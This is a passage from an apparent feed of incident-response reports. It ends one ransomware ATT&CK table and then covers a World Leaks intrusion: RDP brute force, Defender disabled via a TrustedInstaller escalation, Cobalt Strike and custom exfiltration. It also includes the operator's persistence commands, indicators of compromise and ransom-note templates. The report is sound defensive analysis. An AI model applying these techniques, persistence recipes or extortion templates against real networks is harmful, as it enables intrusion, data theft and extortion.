&lt;td&gt;veeam-backup Domain Admin, Admin2 local&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lateral Movement&lt;/td&gt;
&lt;td&gt;T1021.001 RDP&lt;/td&gt;
&lt;td&gt;domain controller to backup server double hop&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lateral Movement&lt;/td&gt;
&lt;td&gt;T1021.002 SMB Admin Shares&lt;/td&gt;
&lt;td&gt;NetExec write test, payload staging&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Execution&lt;/td&gt;
&lt;td&gt;T1047 WMI&lt;/td&gt;
&lt;td&gt;Impacket wmiexec&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defense Evasion&lt;/td&gt;
&lt;td&gt;T1562.001 Impair Defenses&lt;/td&gt;
&lt;td&gt;Defender disabled, exclusions added&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defense Evasion&lt;/td&gt;
&lt;td&gt;T1070.001 Clear Windows Event Logs&lt;/td&gt;
&lt;td&gt;Security log cleared as SYSTEM&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Exfiltration&lt;/td&gt;
&lt;td&gt;T1048 Exfiltration Over Alternative Protocol&lt;/td&gt;
&lt;td&gt;rclone over SFTP&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Impact&lt;/td&gt;
&lt;td&gt;T1486 Data Encrypted for Impact&lt;/td&gt;
&lt;td&gt;The Gentlemen ransomware through Group Policy&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Impact&lt;/td&gt;
&lt;td&gt;T1490 Inhibit System Recovery&lt;/td&gt;
&lt;td&gt;vssadmin and wmic shadow deletion&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;References&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;The Gentlemen, Ransomware.live - &lt;a href=&quot;https://www.ransomware.live/group/thegentlemen&quot;&gt;https://www.ransomware.live/group/thegentlemen&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;The Gentlemen: A New Ransomware Threat Climbing the Charts Fast, Check Point Research - &lt;a href=&quot;https://blog.checkpoint.com/research/the-gentlemen-a-new-ransomware-threat-climbing-the-charts-fast/&quot;&gt;https://blog.checkpoint.com/research/the-gentlemen-a-new-ransomware-threat-climbing-the-charts-fast/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;DFIR Report: The Gentlemen, Check Point Research - &lt;a href=&quot;https://research.checkpoint.com/2026/dfir-report-the-gentlemen/&quot;&gt;https://research.checkpoint.com/2026/dfir-report-the-gentlemen/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Thus Spoke The Gentlemen, Check Point Research - &lt;a href=&quot;https://research.checkpoint.com/2026/thus-spoke-the-gentlemen/&quot;&gt;https://research.checkpoint.com/2026/thus-spoke-the-gentlemen/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Threat Assessment: The Gentlemen Ransomware Group, Halcyon - &lt;a href=&quot;https://www.halcyon.ai/ransomware-research-reports/threat-assessment-the-gentlemen-ransomware-group&quot;&gt;https://www.halcyon.ai/ransomware-research-reports/threat-assessment-the-gentlemen-ransomware-group&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Hasta la vista, Hastalamuerte: An Overview of The Gentlemen&apos;s TTPs, Group-IB - &lt;a href=&quot;https://www.group-ib.com/blog/hastalamuerte-gentlemen-raas-ttps/&quot;&gt;https://www.group-ib.com/blog/hastalamuerte-gentlemen-raas-ttps/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded><category>Extortion</category><category>Ransomware</category><category>SSL VPN</category><category>AD CS</category><category>Group Policy</category></item><item><title>World Leaks: RDP Access Leads to Custom Exfiltration and Personalized Extortion</title><link>https://breachcache.com/cases/worldleaks-extortion/</link><guid isPermaLink="true">https://breachcache.com/cases/worldleaks-extortion/</guid><description>Two phase intrusion: RDP brute force, privacy.sexy defense kill, Cobalt Strike, SoftPerfect Network Scanner, custom Rust exfiltration tool across 6,900+ Cloudflare IPs, personalized ransom notes addressed by name to every employee. Full negotiation chats included.</description><pubDate>Mon, 13 Apr 2026 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;At a Glance&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Dwell time:&lt;/strong&gt; 2 days&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Initial access:&lt;/strong&gt; RDP brute force (targeted wordlist)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Defense evasion:&lt;/strong&gt; privacy.sexy&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;C2:&lt;/strong&gt; Cobalt Strike + custom TCP beacon&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Lateral movement:&lt;/strong&gt; RDP and SMB&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Exfiltration:&lt;/strong&gt; Custom exfil tool, 6,900+ unique Cloudflare IPs over 443&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Extortion:&lt;/strong&gt; Personalized note for each user, 2 templates (leadership / employee)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Negotiation:&lt;/strong&gt; $200,000 BTC demanded, negotiated down to $85,000, full negotiation chats included&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src=&quot;https://breachcache.com/cases/worldleaks-extortion/attack-flow.png&quot; alt=&quot;Attack Flow&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;Executive Summary&lt;/h2&gt;
&lt;p&gt;Over this two day intrusion World Leaks gained initial access to the network and quickly moved to critical infrastructure including the domain controller and backup server. The threat actor&apos;s goal was to access and exfiltrate sensitive corporate data across the organization which they used to pressure the victim into paying an extortion demand.&lt;/p&gt;
&lt;p&gt;The threat actor brute forced the Administrator account on an exposed RDP service using a targeted wordlist specific to the company. The password would not have been found on a common wordlist indicating the threat actor performed reconnaissance on the organization prior to the brute force. Within 2 minutes of logging in the threat actor executed privacy.sexy to disable security controls and then deployed SoftPerfect Network Scanner with a pre built config to map the network. They then deployed a Cobalt Strike stager directly into PowerShell process memory and dropped lactenin.exe which is malware masquerading as a Microsoft Edge Update installer.&lt;/p&gt;
&lt;p&gt;The threat actor moved laterally to the domain controller over RDP using the same Administrator credentials and replicated their tools across. They ran the same privacy.sexy script on the domain controller and copied lactenin.exe over SMB executing it immediately. The threat actor was removed from the network the same day.&lt;/p&gt;
&lt;p&gt;The threat actor regained access the following day due to the original RDP exposure not being remediated. They accessed the backup server within 2 minutes of regaining access and attempted SSH connections to the Linux file server which all failed. The threat actor then downloaded agent.exe (RustyRocket, first identified and named by Accenture) which is a custom exfiltration platform that World Leaks distributes to their operators. An operator README that was able to be recovered indicates this is a maintained platform with three operating modes, persistence recipes, and a companion pivoting proxy for segmented networks.&lt;/p&gt;
&lt;p&gt;Both the domain controller and backup server ran agent.exe simultaneously connecting to over 6,900 unique Cloudflare IPs over 443 to exfiltrate data collected over 445 from every reachable host. After exfiltrating the data the threat actor spent 68 minutes placing personalized extortion notes on every reachable workstation addressed by name to each user with separate templates for leadership and employees.&lt;/p&gt;
&lt;h2&gt;Initial Access&lt;/h2&gt;
&lt;p&gt;The threat actor first probed the exposed RDP service the day before with 2 SYN packets from 45.227.254[.]128 at 05:53 UTC. On Day 1 the first failed authentication attempt (Event 4625) was observed at 11:05 UTC and the brute force succeeded 2 minutes later at 11:07 UTC which was observed as a Type 3 NLA validation event with workstation name SBSSRV. The threat actor manually logged in over RDP 4 minutes later at 11:11 UTC. The password was custom to the organization and would not have been found on a common wordlist. This indicates the threat actor performed reconnaissance on the company prior to the brute force and built a targeted wordlist incorporating the company name.&lt;/p&gt;
&lt;p&gt;The source IP 45.227.254[.]128 is a Windows Server 2012 R2 machine (hostname SBSSRV) hosted by Flyservers/XWIN UNIVERSAL (AS267784). This same IP was used across both phases of the intrusion with external RDP authentications Day 1 and Day 2 after the threat actor was kicked out. The RDP exposure was not remediated. The threat actor regained access the following day from the same source IP.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://breachcache.com/cases/worldleaks-extortion/event-4625-bruteforce.png&quot; alt=&quot;Event 4625 failed logon from the threat actor&apos;s brute force&quot; /&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Reconnaissance:
  Day before, 05:53:47 UTC  2 SYN packets from 45.227.254[.]128 (probe)

Brute Force:
  Day 1, 11:05:01 UTC  First failed logon (Event 4625, Administrator)
  Day 1, 11:07:12 UTC  Brute force succeeds (Type 3, workstation: SBSSRV)
  2,153 failed logon attempts (Event 4625) from SBSSRV

RDP Logon:
  Time: 11:11:38 UTC (4 minutes after brute force success)
  Source: 45.227.254[.]128 (Flyservers/XWIN UNIVERSAL, Vilnius LT, AS267784)
  Target: Entry workstation, port 3389
  Account: Administrator
  Logon Type: 10 (RemoteInteractive)

Day 2 Regained access:
  Source: 45.227.254[.]128 (same IP)
  Account: Administrator
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Establishing a Foothold&lt;/h2&gt;
&lt;h3&gt;privacy.sexy&lt;/h3&gt;
&lt;p&gt;The threat actor used scripts generated by privacy.sexy which is a legitimate open source privacy hardening tool that can be found online.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://breachcache.com/cases/worldleaks-extortion/privacy-sexy-script.png&quot; alt=&quot;privacy.sexy Disable Defender script&quot; /&gt;&lt;/p&gt;
&lt;p&gt;The script uses a TrustedInstaller privilege escalation to execute commands that even local administrators cannot run directly. It works by creating a scheduled task named privacy.sexy invoke and then using the Schedule.Service COM object to call RunEx() on that task passing in the TrustedInstaller SID (S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464) as the execution identity. Because TrustedInstaller is the owner of protected system services like WinDefend the task runs with the permissions needed to stop and disable them. The script wraps the actual commands in a temporary batch file which gets executed through cmd.exe under the TrustedInstaller context.&lt;/p&gt;
&lt;p&gt;The threat actor executed the script on the entry workstation at 11:13 UTC. The script executed 110 commands in 8 seconds disabling WinDefend, MpsSvc, Sense, WdNisSvc and SecurityHealthService. This tool has previously been observed used by Octo Tempest, a BlackCat/ALPHV affiliate, as documented by Microsoft in October 2023.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://breachcache.com/cases/worldleaks-extortion/event-4688-privacysexy.png&quot; alt=&quot;Event 4688 privacy.sexy TrustedInstaller escalation&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;SoftPerfect Network Scanner (netscan.exe)&lt;/h3&gt;
&lt;p&gt;The threat actor deployed SoftPerfect Network Scanner (netscan.exe) on the entry workstation at 11:17 UTC. The tool was copied from the threat actor&apos;s server and extracted from a zip file via Windows Explorer. This was a licensed copy which includes additional features over the free version and it came with a pre built configuration file. The config had TCP port scanning enabled for 22, 389, 443, 445, 636, 902, 3389, 2179, 5000, 5001, 6170, 8080, 9401 and 9091. Port 9401 is the Veeam Backup Service secure connection port which is used by the mount server to communicate with the backup server. The inclusion of this port in the scan config suggests the threat actor routinely targets Veeam backup infrastructure. Share enumeration was enabled with write access checking turned on which allowed the threat actor to identify which shares they could write to across the network. The config also had workstation enumeration enabled for user accounts, disk drives, LAN groups, logged in users, roles and uptime. The tool ran on Day 1 from 11:17 to 11:39 UTC scanning 14 unique hosts across the network and was used again on Day 2 from 05:58 to 08:35 UTC to access SMB shares for placing the extortion notes.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Config highlights:
  TCP ports: 22, 389, 443, 445, 636, 902, 3389, 2179, 5000, 5001, 6170, 8080, 9401, 9091
  Share enumeration: enabled
  Write access check: enabled
  Share security info: enabled
  Disk space check: enabled
  Workstation enumeration: accounts, disk drives, LAN group, logged users, roles, uptime
  Max threads: 50
  Randomized scan order: enabled

Day 1: 11:17 to 11:39 UTC (network mapping, 255 events, 14 hosts)
Day 2: 05:58 to 08:35 UTC (SMB access for extortion notes, 502 events, 13 hosts)
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Cobalt Strike&lt;/h3&gt;
&lt;p&gt;At 11:26 UTC a Cobalt Strike PowerShell stager was deployed manually by the threat actor copying and pasting into the PowerShell terminal. The command decoded base64 which then unzipped a blob leading to shell code injection into the PowerShell process. The beacon communicated with 45.227.253[.]139 over 31822 using the URI /8qiJ. The same IP was observed hosting a TLS service on port 59050 with a self signed certificate issued to CN=Pwn3rs Striked (O=Pwn3rs, OU=AdvancedReversing) which is associated with a cracked version of Cobalt Strike distributed through a popular software cracking Telegram channel Pwn3rs.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://breachcache.com/cases/worldleaks-extortion/cs-cert.png&quot; alt=&quot;Pwn3rs Striked certificate on Censys&quot; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://breachcache.com/cases/worldleaks-extortion/pwn3rs-telegram.png&quot; alt=&quot;Pwn3rs Telegram channel distributing cracked Cobalt Strike&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;lactenin.exe&lt;/h3&gt;
&lt;p&gt;The threat actor deployed lactenin.exe which is a malware masquerading as a Microsoft Edge Update installer to the &lt;code&gt;C:\inetpub\&lt;/code&gt; directory on the entry workstation. The binary is written in Go and obfuscated using a science fiction theme for its variable and function names including turretController, navigationData, optimizeTargetingAlgorithm, manageCoolingSystem, powerDistributor, threatAssessment, and Plasma Conduit Calibration. The binary uses a self signed certificate (C2RService, untrusted root) and contained metadata referencing Microsoft Corporation with the original filename MicrosoftEdgeUpdateSetup.exe. The tool was downloaded from temp[.]sh. lactenin.exe beaconed to 195.66.213[.]218 over 4381.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;File: C:\inetpub\lactenin.exe
SHA256: a80f5c877ccc7fa71b9de1eb9bd82f9525f1ab282d15c4b4beaffabbf3064c31
Language: Go based
Masquerade: MicrosoftEdgeUpdateSetup.exe
Download: temp[.]sh
C2: 195.66.213[.]218:4381 (3-4 minute beacon intervals)
Certificate: Self signed (C2RService, untrusted root)

Execution on entry workstation:
  Time: Day 1, 11:31:06 UTC | PID: 5784 | Parent: Explorer.EXE
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Lateral Movement&lt;/h2&gt;
&lt;p&gt;The threat actor moved laterally to the domain controller over RDP at 11:31 UTC using the same Administrator credentials they brute forced. They ran the same privacy.sexy script on the domain controller at 11:32 UTC disabling the same security controls. They then copied lactenin.exe from the entry workstation to the domain controller over SMB at 11:38 UTC and executed it immediately. The file was written over SMB using SoftPerfect Network Scanner sourcing from the entry workstation. The threat actor also attempted to download PSTools from Microsoft&apos;s official site via Chrome on the domain controller but was removed from the network before the download completed.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Day 1:
  11:11:38 UTC  RDP into entry workstation (initial access from 45.227.254[.]128)
  11:31:48 UTC  RDP to domain controller (same brute forced Administrator account)
  11:32:32 UTC  privacy.sexy executed on domain controller
  11:38:30 UTC  lactenin.exe copied to DC over SMB
  11:38:44 UTC  lactenin.exe executed on DC
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;On Day 2 the threat actor logged back into the entry workstation at 05:57 UTC from 45.227.254[.]128. 2 minutes later they were on the backup server at 05:59 UTC which was the first host they moved to after regaining access. Seconds after logging in the threat actor launched the Veeam Backup and Replication console (veeam.backup.shell.exe) and began browsing through backup jobs, repositories, and storage configurations. The threat actor spent roughly 3 minutes inside the Veeam console looking for indications of virtualized infrastructure being backed up including VMware vSphere, Hyper-V, and Proxmox workloads. During the same window the threat actor pinged 45.227.254[.]128 and 45.227.253[.]139 from the backup server to confirm outbound reachability to their operating server and Cobalt Strike C2 before deploying additional tools. This was consistent with the NetScan config deployed on Day 1 which had port 9401 (Veeam Backup Service) enabled in its scan list indicating the threat actor routinely targets backup infrastructure as part of their operations.&lt;/p&gt;
&lt;p&gt;At 06:23 UTC the threat actor ran mstsc.exe targeting the domain controller IP on the entry workstation. The logon on the domain controller was recorded as a Type 7 (Unlock/Reconnect) not a Type 10 which means the RDP session from Day 1 was still active on the domain controller and the threat actor reconnected to it rather than starting a new session.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Domain Controller Reconnect:
  06:23:53 UTC  mstsc.exe /v:[DC IP] on entry workstation
  06:24:07 UTC  Type 7 logon on domain controller
  Account: Administrator
  Source: [Entry workstation IP]
  Auth Package: Negotiate
  Elevated Token: Yes
  Note: Type 7 = session reconnect, not new session
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The threat actor attempted SSH connections from the domain controller to the Linux file server using lactenin.exe over 22 trying a backup service account and then root but all 4 attempts failed.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Day 2:
  05:57:54 UTC  RDP back into entry workstation (regained access from 45.227.254[.]128)
  05:59:09 UTC  RDP to backup server (Administrator)
  06:06:35 UTC  ping 45.227.254[.]128 from backup server
  06:06:56 UTC  ping 45.227.253[.]139 from backup server
  06:23:53 UTC  RDP reconnect to domain controller (Type 7, Day 1 session still active)
  06:42:41 UTC  SSH to file server via lactenin.exe (failed)
  06:43:11 UTC  SSH failed: backup service account
  06:43:28 UTC  SSH failed: backup service account
  06:52:18 UTC  SSH failed: root
  06:52:32 UTC  SSH failed: root
  06:53:55 UTC  RDP to backup server (backup service account)
  07:01:04 UTC  RDP to workstation 1 (owner account)
  08:57:09 UTC  RDP to domain controller (domain admin account)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Recorded footage from day 2 of the intrusion:&lt;/strong&gt;&lt;/p&gt;
&lt;video controls preload=&quot;metadata&quot; width=&quot;100%&quot; poster=&quot;/cases/worldleaks-extortion/videos/worldleak-thumb.png&quot;&gt;
  &lt;source src=&quot;https://breachcache.com/cases/worldleaks-extortion/videos/worldleak-intrusion.mp4&quot; type=&quot;video/mp4&quot;&gt;&lt;/source&gt;
&lt;/video&gt;
&lt;h2&gt;Exfiltration&lt;/h2&gt;
&lt;h3&gt;RustyRocket (agent.exe)&lt;/h3&gt;
&lt;p&gt;After the failed SSH attempts the threat actor opened Chrome on the domain controller and downloaded agent.zip from temp[.]sh at 06:45 UTC.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://breachcache.com/cases/worldleaks-extortion/tempsh-agent.png&quot; alt=&quot;agent.zip downloaded from temp[.]sh&quot; /&gt;&lt;/p&gt;
&lt;p&gt;The threat actor extracted agent.exe and placed it in &lt;code&gt;C:\ProgramData\Veeam\&lt;/code&gt; on the domain controller. This path did not exist on the domain controller and was created by the threat actor to mimic legitimate Veeam infrastructure. 8 minutes later the threat actor copied agent.exe over SMB to the backup server where &lt;code&gt;C:\ProgramData\Veeam\&lt;/code&gt; was a legitimate path used by the Veeam Backup and Replication installation. An operator README titled Documentation that was able to be recovered indicates this is a maintained exfiltration platform that World Leaks distributes to their operators.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;File: C:\ProgramData\Veeam\agent.exe
SHA256: 743f9dbb32f86322c5f55f1e9051c5cd88092f10adcdac45aa648ac06e229b8a
Language: Rust
Download: temp[.]sh
Companion: Pivoting Proxy (not observed in this intrusion)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The help output from agent.exe reveals the full command line interface available to operators:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://breachcache.com/cases/worldleaks-extortion/agent-help.png&quot; alt=&quot;agent.exe help output&quot; /&gt;&lt;/p&gt;
&lt;p&gt;The tool accepts IP addresses, hostnames, or share paths as arguments for targeted scanning. The --server and --client flags enable the distributed CLIENT/SERVER mode where one instance serves configuration to others across the network. The --user flag accepts domain administrator credentials in DOMAIN\USER:PASSWORD format to authenticate against remote shares. The --proxy flag connects to the companion pivoting proxy for routing traffic out of segmented networks. The --net-probes flag controls the number of concurrent host probes per second which defaults to 100.&lt;/p&gt;
&lt;h4&gt;Notable Snippets From Operator README&lt;/h4&gt;
&lt;p&gt;From the recovered documentation:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&apos;The Agent Software is designed to index files across the network and securely transfer them to Secure Cloud Storage. It is essential to manage the encrypted configuration carefully to prevent interception.&apos;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;pre&gt;&lt;code&gt;Operating Modes:
  NORMAL: Reads encrypted config from stdin. Indexes files. Transfers to cloud.
  CLIENT/SERVER: Multiple clients across network with one server. Can run as SYSTEM.
  SERVER (Linux): Listens for client connections. Distributes config.

NORMAL mode warning from README:
  &apos;Tightly coupled to a user session; if the session is terminated,
   the program will stop.&apos;

Documented persistence methods:
  1. sc create (local service as SYSTEM via svcrun.exe wrapper)
  2. sc \\&amp;lt;RemoteHost&amp;gt; create (remote service deployment)
  3. schtasks /create /ru SYSTEM (scheduled task)

Companion tool:
  &apos;The Pivoting Proxy Software is useful when a file server is not connected
   to the Internet but is accessible from the local network.&apos;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The Pivoting Proxy was not observed in this intrusion but its existence in the documentation is notable. The concept is similar to how Cobalt Strike handles segmented networks using SMB beacons that chain through a parent HTTP beacon to reach the internet. In that model a beacon on a host with no internet access communicates over SMB to a beacon on a host that does and the traffic is relayed out. The World Leaks pivoting proxy serves the same purpose for their exfiltration tool. If agent.exe is running on a file server that cannot reach the internet the proxy runs on a host that can and routes the exfiltration traffic through it. The fact that this is a separate documented tool rather than a built in feature suggests World Leaks has encountered enough segmented networks to justify developing a standalone solution for it. As mentioned earlier the threat actor pinged their external infrastructure from the backup server confirming it had internet access. This may have been a test to see if the companion tool was needed.&lt;/p&gt;
&lt;h3&gt;Deployment&lt;/h3&gt;
&lt;p&gt;Both instances were executed in NORMAL mode with the encrypted configuration passed manually by the threat actor at run time resulting in agent.exe being ran with no command flags. When executed agent.exe prompts the operator to paste the encrypted configuration directly into the terminal window.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://breachcache.com/cases/worldleaks-extortion/agent-config-prompt.png&quot; alt=&quot;agent.exe encrypted config prompt&quot; /&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Domain Controller (C:\ProgramData\Veeam\ path created by threat actor):
  06:45:30 UTC  Chrome opened, agent.zip downloaded from temp[.]sh
  06:47:07 UTC  agent.exe dropped
  06:48:41 UTC  Execution
  06:49:29 UTC  First outbound HTTPS 443 to Cloudflare

Backup Server (C:\ProgramData\Veeam\ legitimate path, Veeam installed):
  06:55:30 UTC  agent.exe copied over SMB
  06:57:37 UTC  First outbound HTTPS 443 to Cloudflare
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;SMB Collection&lt;/h3&gt;
&lt;p&gt;The domain controller instance handled the SMB collection connecting to every reachable host across the network over 445 indexing and exfiltrating every file from 10 hosts in 8 minutes generating 408,055 share access events.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DC SMB 445 collection: 06:52:37 to 07:00:48 UTC (8 minutes, 10 hosts, 408,055 share access events)

Internal targets accessed by both instances:
  Domain controller, file server, backup server, 7 workstations
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Cloudflare Exfiltration&lt;/h3&gt;
&lt;p&gt;Both instances transmitted data over 443 to infrastructure sitting behind Cloudflare. The tool connected to over 6,900 unique IPs across both hosts all within Cloudflare ranges (104.x.x.x, 172.6x.x.x) not relying on a single IP for exfiltration. The volume of unique IPs suggests the exfiltration infrastructure is distributed across a large number of Cloudflare backed endpoints. The outbound connections continued until the threat actor was evicted from the network.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Domain Controller:
  3,506 unique external IPs over 443
  3,548 total outbound HTTPS connections

Backup Server:
  3,460 unique external IPs over 443
  3,456 total outbound HTTPS connections

Combined: 6,900+ unique Cloudflare IPs across both hosts (104.x.x.x, 172.6x.x.x)
Both hosts contributed roughly equal exfiltration volume.
Both continued outbound connections until eviction.
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Extortion&lt;/h2&gt;
&lt;p&gt;The threat actor did not drop a generic extortion note across the network. Each WARNING_DATA_LEAK.txt was written and addressed by name to the user of that specific workstation. The threat actor spent 68 minutes from 07:49 to 08:57 UTC placing the files in the Desktop, Downloads, and Documents folders on each host. The threat actor used a combination of RDP and SoftPerfect Network Scanner to deploy the notes. NetScan which was deployed on Day 1 and still running on the entry workstation was used to access remote SMB shares across the network while RDP was used to connect directly to hosts and place files manually.&lt;/p&gt;
&lt;p&gt;The threat actor addressed leadership by their full names. They addressed regular employees by their first names only and included a line instructing them to pass the message to management. The threat actor was observed browsing Active Directory on the domain controller inspecting user accounts, group memberships, and job titles to identify who was leadership and who was regular staff.&lt;/p&gt;
&lt;h3&gt;Management Template&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;Dear [Admin Full Name], [Owner Full Name],&lt;/p&gt;
&lt;p&gt;We hope this message finds you well. We are writing to inform you of a serious matter concerning your company&apos;s data security. Our team has obtained a copy of your data, which is currently in our possession.&lt;/p&gt;
&lt;p&gt;Think about the future of your business.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Download and run Tor Browser from hxxps://www[.]torproject[.]org/download/&lt;/li&gt;
&lt;li&gt;Navigate to: [.onion negotiation portal - defanged]&lt;/li&gt;
&lt;li&gt;Log in using credentials: [unique login / password]&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Sincerely,
World Leaks&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Employee Template&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;Dear [First Name],&lt;/p&gt;
&lt;p&gt;Please pass this message on to your management.&lt;/p&gt;
&lt;p&gt;[Same body text as management template]
[Same Tor portal + credentials]&lt;/p&gt;
&lt;p&gt;Sincerely,
World Leaks&lt;/p&gt;
&lt;/blockquote&gt;
&lt;pre&gt;&lt;code&gt;Extortion Infrastructure:
  Group: World Leaks
  Portal: vw6vklsuotptwdbiwqfvd7y4b57wdbfm6ypxduzzgbt62snti6jm76yd[.]onion
  Leak Site: worldleaksartrjm3c6vasllvgacbi5u3mgzkluehrzhk2jz4taufuid[.]onion
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Negotiation&lt;/h2&gt;
&lt;p&gt;The threat actor directed the victim to a Tor negotiation portal using credentials provided in the extortion notes. The portal included a live chat interface where the threat actor communicated directly with the victim. The following is the full negotiation chat:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://breachcache.com/cases/worldleaks-extortion/negotiation-chat-1.png&quot; alt=&quot;World Leaks negotiation portal chat log&quot; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://breachcache.com/cases/worldleaks-extortion/negotiation-chat-2.png&quot; alt=&quot;World Leaks negotiation portal chat log continued&quot; /&gt;&lt;/p&gt;
&lt;div&gt;&lt;/div&gt;
&lt;h2&gt;Timeline&lt;/h2&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Time (UTC)&lt;/th&gt;
&lt;th&gt;Event&lt;/th&gt;
&lt;th&gt;Detail&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Day before, 05:53&lt;/td&gt;
&lt;td&gt;RDP probe&lt;/td&gt;
&lt;td&gt;2 SYN packets from 45.227.254[.]128&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 1, 11:05&lt;/td&gt;
&lt;td&gt;First failed logon&lt;/td&gt;
&lt;td&gt;Event 4625, Administrator, 2,153 attempts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 1, 11:07&lt;/td&gt;
&lt;td&gt;Brute force succeeds&lt;/td&gt;
&lt;td&gt;Administrator&apos;s password guessed correctly&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 1, 11:11&lt;/td&gt;
&lt;td&gt;RDP logon&lt;/td&gt;
&lt;td&gt;Administrator from 45.227.254[.]128&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 1, 11:13&lt;/td&gt;
&lt;td&gt;privacy.sexy&lt;/td&gt;
&lt;td&gt;110 commands on entry workstation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 1, 11:17&lt;/td&gt;
&lt;td&gt;NetScan deployed&lt;/td&gt;
&lt;td&gt;Licensed copy with pre built config&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 1, 11:26&lt;/td&gt;
&lt;td&gt;Cobalt Strike stager&lt;/td&gt;
&lt;td&gt;PowerShell in process memory, C2 45.227.253[.]139:31822&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 1, 11:31&lt;/td&gt;
&lt;td&gt;lactenin.exe + C2&lt;/td&gt;
&lt;td&gt;Execution + first beacon to 195.66.213[.]218:4381&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 1, 11:31&lt;/td&gt;
&lt;td&gt;RDP to domain controller&lt;/td&gt;
&lt;td&gt;Same brute forced Administrator account&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 1, 11:32&lt;/td&gt;
&lt;td&gt;privacy.sexy on DC&lt;/td&gt;
&lt;td&gt;TrustedInstaller escalation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 1, 11:38&lt;/td&gt;
&lt;td&gt;lactenin.exe to DC&lt;/td&gt;
&lt;td&gt;SMB copy + immediate execution&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
